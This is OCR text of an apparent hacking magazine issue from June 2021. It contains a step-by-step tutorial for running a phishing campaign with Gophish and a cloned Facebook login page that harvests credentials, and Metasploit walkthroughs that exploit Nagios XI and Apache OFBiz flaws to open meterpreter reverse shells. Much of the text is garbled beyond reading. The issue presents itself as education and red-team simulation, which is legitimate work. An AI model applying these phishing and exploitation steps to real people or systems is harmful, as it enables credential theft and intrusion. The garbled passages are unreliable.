eat eR aarAl) (3 June 2021 Edition 4 Issue 6 Ee UPA ECU RS eI lt cl ie? | Using Rust to Bypass ATA SCRUM TOs TOUT M eH Ce SRO MT ML What’s New : Kali Linux 2021.2G shells” RUN YOUR Meee COMPUTER Ry er OU ea Advertise with us Contact : [email protected]Copyright © 2016 Hackercool CyberSecurity (OPC) Pvt Ltd All rights reserved. No part of this publication may be reproduced, distributed, or ransmitted in any form or by any means, including photocopying, recording, or other electronic 1 mechanical methods, without the prior written permission of the publishe -r, except in the case bi brief quotations embodied in critical reviews and certain other noncommercial uses permitted yy copyright law. For permission requests, write to the publisher, addressed “Attention: Permissions Coordinator,” at the address below. ny references to historical events, real people, or real places are used fictitiously. Na -mes, haracters, and places are products of the author's imagination. Hackercool Cybersecurity (OPC) Pvt Ltd. Banjara Hills, Hyderabad 500034 Telangana, India. Website : www.hackercoolmagazine.com Email Address [email protected]Information provided in this Magazine is strictly for educational purpose only. Please don't misuse this knowledge to hack into devices or networks without taking permission. The Magazine will not take any responsibility for misuse of this information. | Hackercool Magazine | May 2021Then you will know the truth and the truth will set you free. John 8:32 Editor's Note Edition 4 Issue 5 Just last week, | had time to read some article about Pricing Strategies for products jand after lot of pondering over slashed the price of our Magazine by almost half. Our [Readers should have already noticed it. We thought this fair in keeping with the current collapse of global economy due to \Covid 19. However, we think there is some GOD's plan in action here. This price cut take s our price to almost the Beginning days of Hackercoo!l Magazine when it was sold only jon Gumroad. Our Yearly Subscription cost 25$ back then while it is 24.99$ now. Those lwere tough days for me while | was a novice in not only ethical hacking but also creating the entire Magazine alone. Back then | was passionate about Ethical Hacking and wanted} to get a job in Infosec domain. While why | started this Magazine is another great story, | |started it and hosted it on Gumroad. The Magazine was running but cyber security job eluded me. As time went by, It lbecame difficult to meet ends. | had to take up a job as a Private Teacher and also tuition |S to make my ends meet. The release of my Magazine got delayed by almost some jmonths due to lack of time. It was at this time that most of my subscribers cancelled their jsubscription. My subscribers fell from 57 to 14. | don't blame them though for cancelling ltheir subscription. They paid for something and they have a right to expect it. But some, jsome very very special subscribers held on. Maybe they were holding on to Faith just like Ime without any proof. It took some months and some very laté nights hard work to clear all my pending Issues. |But by GOD's grace | did it. | tried my best to get back and do justice to those subscribers lwho felt cheated and left. | got some of them back by giving entire One Year Issues Free to them. Efforts are still on my part to do justice to them. | think this price change by GOD is a part of it. Still, those subscribers on Gumroad (even cancelled also) are very very special to me. They kept a Dream alive and taught me a important lesson. Trust can be easily broken |but very difficult to build. afichaboavorht “RANSOMWARE ATTACKS ARE ALWAYS UNACCEPTABLE BUT WHEN THEY TARGET CRITICAL INFRASTRUCTURE WE WILL SPARE NO EFFORT IN OUR RESPONSE,” - US DEPUTY ATTORNEY GENERAL LISA MONACO | Hackercool Magazine | May 2021INSIDE ‘See what our Hackercool Magazine June 2021 Issue has in store for you. 1. It All Starts With An Email : How to setup a Phishing Campaign : Phishing Attack Simulation. 2. Hacking Q&A : Answers to some of the questions our readers ask. 3. Metasploit This Month : Apache OfBiz Deserialization and 3 Latest Nagios Modules 4. Bypassing Antivirus : Using Rust Programming to Bypass Antivirus 5. What's New : Kali Linux 2021.2 6. Online Security : Inside a ransomware attack: how dark webs of cybercriminals collaborate to pull one off 7.Tool Of The Month : Cactus Torch. Downloads Useful Resources 21 22 32 40 49 51 | Hackercool Magazine | May 2021How To Set Up a Phishing Campaign - Phishing Attack Simulation IT ALL STARTS WITH AN EMAIL In some of the Real World Hacking Scenarios readers have seen in this magazine, vietims | were made to click on a link to compromise their system. In a recent example, we have s Hackercool compromised a website and then hosted malware on that website. Then it was mentioned that he convinced victims to visit that malicious website. The process which was not; shown in the April 2021 Issue is known as Social Engineering. J) Social Engineering is very gravely underestimated. When | learnt about Social Engineering as part of m; CEH certification, | Kalyan Chinta, personally thought it as one chapter which could not be any use to me| The reason for this was because it involved convincing users to allow their systems to be hacked. | thou| | ght who would allow themselves to be hacked. Why would anyone install malware or click on a suspicio- lus link intentionally. That would be simply foolish of him or her. However, my opinion would change after some years when I took up the role of a cyber security lrainer. As part of my training a new batch for CEH certification, one of the students wanted to try the lphishing tutorial in Social Engineering Attack practically. He created a phishing site of the Facebook Login page (Facebook was very popular, more than| Instagram back then and almost everyone wanted to hack someone's Facebook account. | once had a [student from Africa who wanted to hack his girlfriend's FB account ). After successfully creating the phished copy of the Facebook Login page, he hosted it on a Wamp [Server (Desktop phishing). Next, came the trickiest part of this phishing practical, to convince the victims lo visit this phishing site and submit their Facebook credentials. | thought he would lose his interest here. [But within 10 minutes he was successful even in that. What surprised me was not that he was successful in convincing a victim to visit his phishing site lout the way in which he did it. He just copied the link of the phishing site and sent this link to one of his friends through Facebook |Messenger and his friend not only clicked on the link but even submitted his Facebook credentials. | am |sure readers have observed the shocking part of this. The friend of my student was already on Facebook| land chatting through Facebook Messenger and even then clicked on a link which opened a web page lsimilar to Facebook. Note that the link was not even shortened or obfuscated. Even then he once again |submitted his Facebook credentials. This reminded me of a famous a saying often used in cyber security. The saying says that the weakest link in cyber security is humans as computers can be programmed but humans cannot. From creation of fake websites to capture credentials, phishing has evolved and became one of the| Imost potent hacking attacks to gain entry to a company's network. Norton Labs recently reported that Johishing campaigns remain the top threat to consumer safety in 2021 In this month's Issue, we are going to show our readers as to how a phishing campaign is created and run. Although, this tutorial is similar to phishing campaigns run by malicious hackers, this campaign can lalso be used to test the security of a company by assessing how vulnerable are the employees of the lcompany to a phishing attack. There are many tools to simulate phishing attacks which are used by Red Team professionals. | will luse one such named Gophish. Gophish is an open-source phishing toolkit designed for businesses and lpenetration testers. It provides the ability to quickly and easily setup and execute phishing engagements land security awareness training. It is available for both windows and Linux operating systems. | will be using a Windows version of Gophish as | want to install it on Windows. Installing Gophish on Windows is damn easy. Just download Gophish for Windows (The download information itis given in ou 1| Hackercool Magazine | May 2024Downloads section). lExtract the contents of the zip archive. After extraction is completed, open Windows command line and lnavigate into the extracted directory and execute the Gophish executable as shown below. This execute-| ls some commands as shown below. If you observe the CMD window, you will find the username and password for the Gophish dashboard, [This part is highlighted in the image above. These credentials are needed to login into the Gophish lashboard. Keep the CMD window open, Open Browser and enter address https://127.0.0.1:3333. This ls the default port on which Gophish runs. If you get any certificate error, click on advanced to bypass it land then enter submit the above mentioned credentials. oo “Ei Ex Your connection isn't private 2 | Hackercool Magazine | May 2021Please sign in [The first thing you will see after logging in is that the system prompts you to reset your password, Reset the password. Bios eo a Reset Your Password INow, you can access the gophish dashboard. 3 | Hackercool Magazine | May 202100 [The first thing we need to do is create a sender profile. This is the mail address from which the spear phi shing email comes from. Bom 7 > E ax ~ Sending Profiles aE < |Click on “sending profiles” tab and then click on “New profile” to create a new Sending Profile. 4 | Hackercool Magazine | May 2021‘atthe options Tor the sending profile, For example, we set the name Tor this as phishing campaign T. ‘o send any type of email, we'll need a SMTP server. For this tutorial, | will be using the SMTP server of [Gmail as | will be sending an email from Gmail. In Real world phishing attacks and even in many phishin| simulations, a new domain is created and the email is sent from that domain's mail to make the phishi- Ing email appear genuine. The username is the Gmail username and password is Gmail password. = ot @ ® ce New Sending Profile [Save the changes. Send a test email to the email of your choice to see if the Phishing email appears as ou want it to be. TD] 0 sosorc conn z: a = he username we specify is very important here as it will be displayed. So it has to be made as convinci-_ Ing as possible. Once you are satisfied with the sending profile, you can save it. 5 | Hackercool Magazine | May 2021> a z Ee =] : = uoo INext, we need to create Users and Groups. This is where we assign target users for of our phishing ca- Impaign. ~ Users & Groups |Click on "New Group” to create a new batch of recipients. [have named this group as Target_1 6| Hackercool Magazine | May 2021New Group [For this tutorial, I'll will add only a single recipient. If you want to add a large number of users, you can save them ina CSV file and just import those users ith the "bulk import users option” The first phishing » e (AOL) and the accused were the members of warez community who exchanged unlicensed elma Mok} active on black hat hacking si The authorities of AOL geht these accounts by detecting words in their our lacelel ns L , 7| Hackercool Magazine | May 2024> Se New Group ¥]@ feasnmanmen ¥|F o Users & Groups 2 nets 2 i's time to create an email template. This is the most important part of a phishing email since it has the femail body that convinces a victim to click or take any other action. "A single spear-phishing email carrying a slightly altered malware can bypass multi-million dollar enterprise security solutions if an adversary deceives a cyber-hygienically apathetic employee into opening the attachment or clicking a malicious link and thereby compromising the entire network.” |- James Scott, Sr. Fellow, institute for Critical Infrastructure Technology 8 | Hackercool Magazine | May 2021jut before we compose the spear phishing email, let's create a phishing website, For this tutorial, we will lbe capturing some credentials. We will create this fake website using Social Engineering Toolkit in Kali lLinux. eC eles New set.config.py file generated on: 2021-06-15 20:07:13.59262 i Verifying configuration update (optional) buy him a beer (or bourbon - hopefully bourbon). Author oe aCe ee eC amc LO OGM TaD) eee ee Ce Le em el COC) ee RUC ee et ee eRe ate eer ete ee RC) eee CCRT de ae ta eee ee ee ae ea ee ee ie te CU en ec a LS ry offer free hugs when possible (and make sure recipient agrees t o mutual hug), and try to do everything you can to be awesome The Social-Engineer Toolkit is designed purely for good and not ev eee eC em eee MECC IeC Cte Tis 4 ea eM ee Ce eR ee eC ur eee Ce aC aay ee eC eee ae ee ete CCE eee Mesa COM Umea SMe CRE ee eee a ae eect Oe Ome Cec Lek mme mee es a 9| Hackercool Magazine | May 2021It's easy to update using the PenTesters Framework! (PTF) Visit https://github.com/trustedsec/ptf to update all your tools! Select from the menu: Oar UCCm Cm vara cy 2) Penetration Testing (Fast-Track) Eyer Molesey Oe ee eee UCT e sed RU eesameae erat Oe Cer ecru ith 0 ee eee ha website attack vectors" option. Ca a CMC Spear-Phishing Attack Vectors Ree eel ae one) eat eMC te Trg cae ate Rel CPE aati Casta eC Em vee td ae tac Wireless Access Point Attack Vector QRCode Generator Attack Vector Powershell Attack Vectors se Resmi Sata ee RLS |Select the site cloner option since we want to create a fake website of another website. pl 10| Hackercool Magazine | May 2021The second method will completely clone a website of your choosin PU ACCT eM See acd a tac ee mM ete 107 SUC C eCca CU Cees Tac ie aCe SM eC eee ae Ce ee CCS Nan UC MOM ROC ee OM RC eee functionality. 1) Web Templates 2) Site Cloner oes ee 1 rt PM aa eR 1 ae CoM set:webattack> IP address for the POST back in Harvester/Tabnabbin g [(192.168.36.171]: SMe). eee RU od [-] Example: http://www. thisisafakesite.com et:webattack> Enter the url to clone:https://facebook. com] Perea ee ee eee g [192.168.36.171]: SET supports both HTTP and HTTPS Example: http://www. thisisafakesite.com Pare ee Eas EPPA LLL | tame eas eae Lee Ae) ce Mec Ce Mecca lc ane ee aCe ne ee MCU ee ce CEE ee es Ld ce CPUC aCe RU meses CUCL eae Lae cas [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below [The phishing site is ready and will display any captured credentials on this terminal. Go back to gophish. 14 | Hackercool Magazine | May 2021[Click On "New Template" to create a new email mo= eee Ce 7 = Remember what | said. This partis the most important and the content of the email should convince the | luser take whatever action you want him to take. We are just showing the age-old account suspension Imail. Let's have a look at some of the spear phishing emails used in real world hacking attacks. ‘Frome Go Oadey «sors a9 day ests» Site ne @ Godaddy # About Your Recent Domain Purchase Final Notice For Domain Verification* [The above mail is sent to Godaddy customers. The Logo, Customer support number etc almost convinc- fe even me but just look at the Sender Email. The domain of Godaddy is godaddy.com but sender email lis really phishy. 12 | Hackercool Magazine | May 2021tom “setearcucangeiat cone Sect Sitar Dear Suntrust Cent, ‘Aspartot our security moasures, we regulary screon actin the sunt Orne Barking System. We recently contacted you afer noting on you" online account, which is been accessed unusual. Sign onto Online Banking with your ser ID and password 2: Select your account We appreciate your business and are commited to helping you each your fact goals. callus at {800 SUNTRUST (784-8789), o stop by your local branch to eam mare about our helpful products and “Thankyou for banking with SunTrust Sincerely, SunTrut Customer Care _ bt 2g Tad Neto ne Aliesresered | Prac Poy | Temaot Service [This above phishing email is a must read. Everything looks so convincing. Even | think | have a account fat Suntrust. Only when we hover over the link that we can see it is suspiciou Your Instagram password has been changed » ster ea supportinstagate medi co Sanrio ens) fe & © Instagram This is a confirmation that the password for your Instagram account has just been changed. If this is your Instagram account but you did't request a password change, you can reset your password here If youre having trouble, please refer to the Instagram Help Center. |The above mail is directed towards Instagram users. Although sender email is phishy, have a look at the Imessage of the mail. it says your Instagram password has been changed and if itis not you that change-| id the password, you are asked to click on the link they have provided to reset your password. It even pro| -vides a link to the Instagram Help Center to appear trustworthy Jam sure readers got an idea about how phishing emails look like. If you find an email suspicious, just hover over the links instead of clicking on them. Once, the body of the email is complete, let's add a lhypertink to the email content. Click on "source". 13 | Hackercool Magazine |May 2021|| want the users to be redirected to my Kali Linux attacker machine. = = The costliest phishing attack targeted Facebook and Google and they together lost more than 100$ million when a Lithuanian hacker used fake invoi to trick their employees to transfer money to his bank accounts. The hacker, Evaldas Rimasauskas operated by setting up a fake company with name similar to Quanta, another company. Both Google and Facebook companies had busin lations with the Quanta company. 14 | Hackercool Magazine | May 2021[The Email template is ready. It's time to set the landing page. Landing page in Gophish is the page wher fe users will be redirected to after clicking a link in the email. . By Oo = = a “I can go into Linkedin and search for network engineers and come up with a list of great spear-phishing targets because they usually have administrator rights over the network. Then | go onto Twitter or Facebook and trick them into doing something and | have privileged access." BEC ued 15| Hackercool Magazine | May 2021[click on "New Page". You can create a new landing page or you can import an already created landing ‘et me import the phishing site | created in SE Toolkit on Kali Linux. After capturing credentials, lust like any phishing website, we can redirect the users to anotehr webpage after capturing credentials. || want the victims to be redirected to the genuine site of Facebook. 16 | Hackercool Magazine | May 2021[Save the landing page. a an SR lEverything is ready. It's time to start the phiishing campaign. Go to campaigns and click on “New Camp- laign”. Amateur hackers hack machines while expert Urol ee. LIL 17| Hackercool Magazine | May 2021[Specify all the options like URI, , the recipients etc and click on" Launch campaign". You can set the dat| Le and timing for the phishing campaign. > ors loon Secret Are you sure? 18 | Hackercool Magazine | May 2021Campaign Scheduled! lin the dashboard you can view result of the campaign. You can see how many victims read your email land how many fell victim to your phishing campaign. mo = ai eae = ai —_ Details [This is how the spear phishing email | created looks in Email Inbox. = Hurry! Your Facebook account is under suspension, ona May 28 Moy17 19| Hackercool Magazine | May 2021fare is the content of the email. ees ites age) ¥r & Mabe We found suspicious actvty on your account abe_fcoks and is currently under suspension. To claim your account please login into facebook ow by clicking below. Reply Forward jere is the phishing site the user is redirected to once he clicks on the link. 7 ae 3 facebook Log nto Facebook |Once he fails to notice the signs of a phishing email, he enters his credentials. ca eT =e ae facebook Log into Facebook sbuocts [These credentials are captured in SE TOOLKIT as shown below. 20 | Hackercool Magazine | May 2021POSSIBLE USERNAME FIELD FOUND: skip_api_login= re Pests) redentials captured and our phishing campaign is successful. This is how a successful campaign is ru- . How did one password allow hackers to -r. B.Tech Cybersecurity is also an undergraduate isrupt colonial pipelines? course but it stresses on subjects like cyber crime, JA: Hackers gained access to the network of colonia Computer security, Network Security, Cryptography | pipeline using a single password. This password _, Intrusion Detection and Prevention, jelonged to a VPN account of a user who worked If your career goal is becoming a penetration bin Colonial Pipeline. Virtual private networks are tester, you shoud choose B. Tech Cyber security as ised by employees to connect remotely to the com it covers more topics you need in future. pany's network. The surprising part of this is that Q_: Ifa file scanned by an anti-virus software the user to whom these credentials belonged to has clears it as “safe”, wil that file be really clear of fora left the company. However, the account was any malware? till active ‘A: Absolutely no. As | always say, the battle betwe- Itis not known how hackers got this account but en Malware and anti Malware is a never ending arm it is assumed that the user credentials were part of | -s race. The presence of an Antivirus only improves different data breach earlier. Maybe, the user reu- security a bit.| say so because hackers are always sed this password for the company's VPN. This is _ trying to bypass this Antivirus. We have seen two | a result of poor cyber security practices. cases in our previous Issue and the present Issue. i2. What is the difference between BTech IT and Recently hackers have been using payloads written Tech Cyber Security? Which is better for in Nim and Rust to bypass anti Malware. So we can ecoming a penetration tester? say just because the Antivirus says the file is safe B. Tech Information Technology is an Under d raduate course of four years which deals with bot- editor@ software and hardware components of a compute hackercoolmagazine.com 21| Hackercool Magazine | May 2021oit This Month feature of this year. Let us learn about the latest exploit mod sploit and how they fare in our tests. Nagios XI Scanner Module TARGET: Nagios XI (almost all versions) TYPE: Remote Module : Auxiliary ANTI-Malware : NA his Auxiliary module detects the version of the Nagios XI web applications and suggest matching exploi |t modules (if any) for the detected version. We have tested this exploit module on Nagios XI 5.6.5 runni- ntos 7. We updated Metasploit and loaded the auxiliary/scanner/http/nagios_xi_scanner modul ieee ee aes eines Cr Cement Terre sab ETO ee mas Cuy Module options (auxiliary/scanner/http/nagios_xi_scanner) : Current Setting Required Description toc name ler cca ere em rte nee C i) s not been completed, try to do Peete Comet mc mes eee oad Poon} Password to authenticate with reat A proxy chain of format type:hos ta oy Hea) as) ee Cua ce ase eae dentifier, or hosts file with sy COMPRES legen eee 80 The target port (TCP) SSL ioe Negotiate SSL/TLS for outgoing c Petey TARGETURI TT trast cee Ce Ce ome) pplication ar z Se aCe a Coarse) eas PECL) Tene a eurs Cc tm tea east] Terres asus ea Scr Rae osu eset vio Tinea Cartas laa TERETE SRET LUE doll 22 | Hackercool Magazine | May 2021Note that ihis 1s a Authenticated module. So Tsetall the options including credentials as shown Below. Peer ay ee ce Cee eC Ce Cre Ce ety) msf6 auxiliary(scenner/htto/nacios xi scanner) > set verbose true Ada iliary(scanner/http/nagios «i scanner) > set password admin Eri msf6 auxiliary(scanner/http/nagios xi scanner) > &j ler all the options are set, | execute the module. Ere ee eee ee) Resumen str cee eae Successfully authenticated to Nagios XI celts Perea 4 aaa version 5.6.5 Dee ae CO eC CR COm muni mo ste) OC ee RAs et LCs a Umea le ume lenticated_r CVE-2020-35578 TCAs Cem mR ast rer ged Oey a tA ee CMe ae ee ete te ae fal Srl Eee D Csaba ir Cem UCM Skee me Scanned 1 of 1 hosts (100% complete Pshec a Cees mec lace Insf6 auxiliary(sconner/http/negios scanner) > As readers can see, the module not only detected the version of Nagios XI but also suggested some exp Hoits fro this version. Since our readers have already seen the nagios_xi_mibs_authenticated_rce and lhagios_xi_plugins_check_plugin_authenticated_rce modules in our previous Issues, let's see some new Imodules. Nagios XI Plugins Filename Authenticate RCE Module his module exploits a command injection vulnerability in (CVE-2020-35578) present in the above menti-| loned versions of Nagios XI. This vulnerability is present in the /admin/monitoringplugins.php page. The Imodule is an authenticated module and needs credentials to work. Once it detects a vulnerable target, the module sends a HTTP POST request to /admin/monitoringplugins.php. This request contains a file w Lhose filename is set such that it will escape the existing command that ‘/admin/monitoringplugins.php* uses on its backend and will instead cause the server to start executing the attacker's own commands as| the ‘apache’ user. Once the file upload is finished, a new plugin entry will be created along with a corresponding file in | ust/local/nagioslibexeci’ with the malicious payload as the file name. The uploaded malicious file is deleted once meterpreter session is spawned. Let's see how this module works. 23 | Hackercool Magazine | May 2021Moar Meet mt Meu ec ke nts Tate at Gbinas ccm merc este mec em CRs Pete teense cee tom reece netic ma Module options (exploit/Linux/http/nagios xi plugins filename authenticated_rce) Name acs merce det rst) Bice C reamed Se Cesare rete) s not been completed, try to do Pee eat Comes St ccm es ener esas Cos} ee me rete cere Crested A proxy chain of format type:hos t:port[,type:host:port][...] Ce Recie ae e OLae dentifier, or hosts file with sy CePA ee aes Melee Ra) a Semele Pec et Mea ae Dee Celera mec ert cy coo oe SCR ee rs Coe ee Negotiate SSL/TLS for outgoing c onnections ssLcert rae Meee s tet (default is randomly generated) TARGETURI Tsay SU Cee cre re eae) pplication SCout) ir in eee Ce occas (default is random) Teas nagiosadmin ved CeCe aste toca Wiese fr Tien tae ess Ce sC ABU ec ease eee Bd Name Current Setting Required Description The listen address (an interface may be s Pesae) een Bieta e la 24 | Hackercool Magazine | May 2021vulnerable. Pacts Se Pee Ee Pees) De Cee CRE SCS) ioe Cea Ree ury oe eT Gl feiss reat [*] Attempting to authenticate to Nagios XI... [+] Successfully authenticated to Nagios XI [eM Cle ae te kee Re Sh Ee) ape yee en ee RC eee eo este ]eraat module. [imoejtskad t 192.168.36.189 Lhost => 192.168.36.189 itaicmoeatsaat a Mee eC Ce CLE LLCS eects en eta ce ce eRe CO) Teese eas ae AN Ara use le eb ee i Sle a Cee a Res Ee) ce ae ce eee Pest Bs eat, A Me eee) etre 10 aes PCa eR Ee] ] Command Stager progress - 100.00% done (122/122 bytes) eae see eC pee CM Oe Ue DMEM LC ILL RAC ceca eae C om apart Cen) ] Sending stage (984904 bytes) to 192.168.36.195 ] Meterpreter session 2 opened (192.168.36.189:4444 -> 192.168.36.195:49790) a t Prec ere ee eae.) [eee Ls [* lig if i i i Es [i { ( lis {i Renters ULL) Cyr Crear 1C Sy is Bet ee) eee CRS eee) me ireetae ee BuildTuple : i486-Linux-must (ecu ea cmmemec YASUI Pees eet ete eR eam Ce CC mee 8) meterpreter > | 25 | Hackercool Magazine | May 2021‘onthe target with apache privileges: Nagios XI Plugins SNMP RCE Module TARGET: Nagios XI 5.5.0 to 5.7.3 TYPE: Remote Module : Exploit ANTI-Malware : NA his module exploits a command injection vulnerability in (CVE-2020-5792) present in the above menti- loned versions of Nagios XI. This vulnerability exists in includes/componenetsnxti/index.php page. The Imodule is an authenticated module and needs credentials to work. The module first checks if the target lis vulnerable. Once it detects a vulnerable target, the exploit module uploads a simple PHP shell via jincludes/components/nxti/index.php” to ‘includes/components/autodiscovery/jobs/. Then this| luploaded php shell is executed via a HTTP GET request to includes/components/autodiscovery/jobs/?= his will result in command specified by the attacker and runs with apache user privileges. Let's see how this module works. We have tested this module on Nagios XI 5.6.5 running on| |Centos 7. Load the nagios_xi_plugins_snmptrap_authenticated _rce module. emerge nee yr eee me ee ae se (enema ies man MEL eeC ae eie et ac [Seco Masi yiaty Cee ade Metco (sUrmee Ct MgC Meee Coc Ieee ed imorltoaa| Em sty PMC stim as Chee Comme ee es hme) PEL aca sU Mtr Me eetet sc) preime eeecIe no cea eeu Cec sC im) s not been completed, try to do neat CoRR ee one eee cua Toco ai} Password to authenticate with fest eve aa t:port[,type:host:port][...] os The target host(s), range CIDR i dentifier, or hosts file with sy Rane NCEE ere ae Ailsa ae) SRVHOST cee Se eas ee CML Lae ey eC sa) met CURR OMe coon es cee eae er Cun SSL Negotiate SSL/TLS for outgoing c onnections ssLCert ree Memes esas tel Ce eee USA ue 1c D) 26 | Hackercool Magazine | May 2021TARGETURI /nagiosxi/ Se Cee merc ca) pplication stu) i) SUC ae ene Costs (default is random) aan CeCe) yes TEC CR etc Rea) Wiese it Peete es Ms CMOS UID h 6) uta eae ee) Name Current Setting Required Description The listen address (an interface may be s asus) eos ALR etcm Clad asa gaa Id Name CRE SU e200) INote that this is a authenticated module. So | set all the options including credentials as shown below. T- lhe check command confirms that the target is indeed vulnerable. Imsf6 exploit(Linux/http/nagios_xi_snmptrap authenticated rce) > set rhosts 192.1] Coe ete rhosts => 192.168.36.195 iia Me) Ces Geet cee eee eae Cie Ft fee eset ray (Sa Gee gas CC MeL ac MSC Mees ee co fea ac SCM cu) ke- 1c co) ae [+] Successfully authenticated to Nagios XI LU ee Ce CC ea hanes Ren Bey eee ye Pe Pe eet OME Cee ae a msf6 exploit (Linux/http/nagios_xi_snmptrap_auther rce) > fj SE EE _ Imsf6 exploit(Linux/http/nagios_xi_snmptrap authenticated rce) > set Uhost 192.16 eet) Ue yee CFEC eT) msf6 exploit(linux/http/nagios_xi_snmptrap authenticated _rce) > runfl After all the options ar "We're all going to have to chai how we think about data protection." Elizabeth Denham 27 | Hackercool Magazine | May 2021Imsf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run Started reverse TCP handler on 192.168.36.189:4444 Executing automatic check (disable AutoCheck to override) Attempting to authenticate to Nagios XI... Successfully authenticated to Nagios XI er ec Core mteES CR ae) eee cece CROC) Ct ee Ck ee mM AC Caos eeu, oe a ite a Tae eae Attempting to execute the initial payload via */nagiosxi/includes/components /autodiscovery/jobs/scnNLwPNT. php?a= Command Stager progress - 100.00% done (773/773 bytes) Sending stage (984904 bytes) to 192.168.36.195 Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/scnN LwPNT. php Meterpreter session 1 opened (192.168.36.189:4444 -> 192.168.36.195:49760) a ary se LEP Pe ) ela ee SAL) Ci ae CU raa eos CS en eC ee eR eee) Architecture : x64 BuildTuple : i486-Linux-musl Meterpreter : x86/Linux meterpreter > getuid CCC ease CS CM CeCe CMe) 8) meterpreter > ff As readers can see, | successfully have a meterpreter session on the target with apache privileges Apache OFBiz SOAP Deserialization RCE Module Apache OFBiz is an open source ERP (Enterprise Resource Planning) software that provides a common lata model and a set of business processes like accounting, asset maintenance , project management letc. The above mentioned versions have an unauthenticated Java deserialization vulnerability. This vuln [erability is present in the SOAP ednpoint (webtools/contro/SOAPService). We have tested this on a Do | cker container of Apache OFBiz 15.12. Let's set the target first. This can be done by running the docker (you should have docker installed) command as shown below 28 | Hackercool Magazine | May 2021ace log Pee eee een ee ee ee am SR tetas! er) CR Remus re St eCe MeCN PCr re nurt mee ee Mesa sed PT eerste Perret ree ere mets 7o04cfc6e122: Already exists Easter iret mrt ey ee mertey mest ee mertey Bere metas Beem Cr eS) erm ats Perm otis etre ee ee eee Presb reese en et Reed at enc oem 2021-06-02 01:06:30,229 |http-nio-8443-exec-2 |Controlserviet eae sea RE NT a ene eet Reo Beets) Prem eee ee ar Meee eer crise Cirerseteri Td It] creating sessio Beviaasia iT etarcr etal 2021-05-02 01:06:30,582 |http-nio-B443-exec-6 |ContextFilter mcr vO Eetrat AMCs escent Poe ee er ee ee cee see remeron a oreo trgte’ Mao mest Domain:https: //172.17.0.2)] Request Begun, encoding=[UTF-8]- total:0.0,since Last(Begin):0.0] Pree eee ce Ce eee reece eestor bed immirmetstssc CaS eum 2021-06-02 01:06:30,608 |http-nio-B443-exec-6 |RequestHandler een ere Peertrernisemct mrt ona sunita crn arn 2021-06-02 01:06:31,053 |http-nio-8443-exec-6 |RequestHandler ee eco) Ce Be sree Ca 2021-06-02 01:06:31,067 |http-nio-B443-exec-6 |ServerHitBin meee it DO ea eum Seg pyre ee eee ist ese eS ee ee uric meat ae cae Lee eS ge ate er Se fer the target is set, load the exploi riailization_soap module. Pare SU eco # Name Pacer caus Cet as ty Petar ce Retest MP rerery pache ORBIZ SOAP Java Deserialization PSOne Meret) pache ORBHZ XML-RPC Java Deserialization See Ce ae ee ec Ce eee ee eee che ofbiz_deserializa nsf6 > Ss 29 | Hackercool Magazine | May 2021caer) OMe CUAL eee ma Pai eee Ratti eee eters ee em ty Deen Stee CAEUe acy a Tem Cosel e is Cums r Too ord Crease trees stl) peered no OO. een oe UE. Door The target host(s), range CIDR identifier, or hosts f OR omnes PORT See ease) cd ee ee eu eRe ee eee ee re ck) ater ern Sas ORC roel ssl Rese OMeR eae re ecard Poked RR esto eee tg Paper) cat ag Base path Ts) ke OCR cach TOS LD) Piro ae Tom TC rian CUR CROtU Uc oe Om See Me MeO rs yes RC ete ony mere) yes cece meters rs SO) Poe eru CR em Ostet LCL mg | all the options shown below. The check command confirms that the target is indeed vulnerable. SOS eT ETE Ear Pewee] Pare atu ae Cee eee ecm eee ery) eee) Peat Ctun oe eee Ca Tey rote msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > check BURA Rime ey eee CN a cae Street es Pores Catan stm reeeeei reese pea gece ee ees peace tes @ece ee reer Pare Qeu ce em eee ee RUT aet ta ee Tree eae Paar ate ey em ee Leer LSC e eS | _eeEEEOOEEOEOEE—_—_—E—EEeeeeeeeee 30 | Hackercool Magazine | May 2021{After all the options are set, | execute the module. Pec tee Started HTTPS reverse handler on https: //172.17.0.1:4455 Executing automatic check (disable AutoCheck to override) Re eR em ee recieer msc oe iy rot meta ameter mee Stra ee eR Mec Ts BM eC CME OT cm tas ere ae eee mee Me se inn arta Te cr aU a Alon) rca eee Ce Merc ysee eT) Client 172.17.0.2 (curl/7.38.0) requested /pwSsuvr8y9tT Sending payload to 172.17.0.2 (curl/7.38.0) Tee Cee a eC Ce Cecio) eee eC Mb merc ete ess https://172.17.0.1:4455 handling request from 172.17.0.2; (UID: @xmqipez) Redirecting stage ree Wate ta ee eet Moses errr) POCO ee ere eR Ce rm uae eer Te REC ato ARE Oe oe ee eC Cn arc ee enter R oer ct eed DURE Ae ae et RA RICO oe rerasc react’ ese etn coct osm tetra choses macarons Pests crap rarer cae Ma este RC rae SCC eee Oreo OA ROUTE e i eT eC RCO ee Cae eels) Pret ete Mbit ee ass eRe eerie et ete eee com scree cs RUS Nea coect cer MT reed amar eto uN ee uren Ly Petro ar sto ar ecm Mate NC ee a eet ee ;_tv:11.0) Like Gecko" OPEC ee oe eC CO OR acc eae Moet eta ire UU ee a Cet CR RECO Uomo ssu acres Recursos aucot ost caer east Lasse ae aL ec erm a Sea RC en a ems CCL ere) etree sary OM UR ROU ee re RUC Co Om Cae Rey eee Ret ee a PSUR e a Ue re Ue CoCr a recur aie) ema it Ui cot ose prc mer Me Crd s NT 6.1; Trident/7.0; rv:11.0) Like Gecko" [1] netps://172.17.0.1:4455 handling request from 172.17.0.2; (WUID: @xmqlpez) Without a databas ee ent Ro eect ete aed eee Rees er eR COC mcr ee) d/stageless session [1] https: //172.17.0.1:4455 handling request from 172.17.0.2; (UUID: @xmqlpez) Without a databas eee etre poms tst este eT cee ee Rey eta Creer R ROR re oe re eee) pearrrire Pru tae tC) Ser a Cr ae te Cea Prien aes Uy 31 | Hackercool Magazine | May 2021BYPASSING ANTIVIRUS Ne Rust is a programming language that began as a personal project in year 2006 by Gradon Hoare, an lemployee of Mozilla. Named after a family of fungi ( we find it odd too ), Rust is becoming increasingly p- pular nowadays. It is termed as an efficient and easy to use language which is considered safe too. It has been Stack Overflow's most loved language from 2016 to 2020. However, it doesn't seem these are the features that are making hackers interested in Rust. Its for a ldifferent reason altogether. 